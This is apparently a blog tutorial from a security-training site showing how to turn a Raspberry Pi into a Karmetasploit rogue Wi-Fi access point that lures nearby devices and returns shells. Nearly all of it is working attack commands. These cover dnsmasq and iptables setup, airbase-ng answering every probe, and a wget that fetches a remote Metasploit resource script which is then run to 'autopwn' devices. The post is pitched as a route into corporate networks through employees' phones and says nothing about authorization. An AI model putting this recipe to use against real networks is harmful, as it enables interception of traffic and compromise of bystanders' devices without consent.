Auto-Compromising Devices with Karmetasploit

March 21, 2016 | Views: 8379

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

For years, I’ve found that penetrating corporate environments through mobile devices is much easier than attacking border-edge firewalls and hardened servers. For this reason, I’ve begun using kits such as Karmetasploit.  Leveraging a Raspberry Pi and Metasploit, allows for instant shells and pillaging of data – using nothing more than a RaspberryPi, Alfa antenna and a internet connection.

 

Here’s how you do it…

Install Raspbian on a Pi2 or greater.  When complete, apply all the available updates:

sudo apt-get update && apt-get -y upgrade && apt-get -y install vim

 

Next, install dnsmasq.  This will be used for DNS resolution and DHCP address handouts:

sudo apt-get -y install dnsmasq

 

Once it’s installed, configure dnsmasq by performing the following:

vi /etc/dnsmasq.conf

Update it to include the following at the top:

If you want dnsmasq to listen for DHCP and DNS requests only on specified interfaces (and the loopback) give the name of the interface (eg eth0) here.

Repeat the line for more than one interface.
interface=at0

interface=wlan0mon
interface=wlan0

Uncomment this to enable the integrated DHCP server. You need to supply the range of addresses available for lease and optionally a lease time. If you have more than one network, you’ll need to repeat this for each network on which you want to supply DHCP service.

dhcp-range=10.10.10.50,10.10.10.150,12h

 

Next, install Aircrack-ng by doing the following:

sudo apt-get -y install aircrack-ng

 

Once this is in place, you’ll need to create the proper rules to forward all “hooked” traffic. You can do this by issuing the following commands:

modprobe iptable_nat
iptables -A FORWARD -i wlan0mon -j ACCEPT
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

 

Okay, time to start hooking devices…

Start airbase-ng in a mode that has a default SSID, but will also associate to all beacon requests.  Issue the following command.  It will also create a new interface named at0:

airbase-ng -P -C 30 -e “linksys” -v wlan0mon

 

If done properly, you’ll see something similar:

Screen-Shot-2016-03-17-at-4.46.40-PM-1024x378

 

Open a second terminal window, issue the following to configure the interface on at0:

ifconfig at0 up 10.10.10.1 netmask 255.255.255.0

 

Restart dnsmasq:

service dnsmasq restart

 

Finally, begin autopwning devices by issuing the following command:

cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txt

 

If done properly, you should see the following:

Screen-Shot-2016-03-17-at-4.58.32-PM-1024x486

You can confirm this by connecting a test device to any previously accepted WiFi networks and opening a browser.  It should reveal the following:

image-200x300

 

When successful, shells will be returned into the second console window that should be running Karmetasploit.

 

Good luck!

Save

Save

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
1 Comment
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel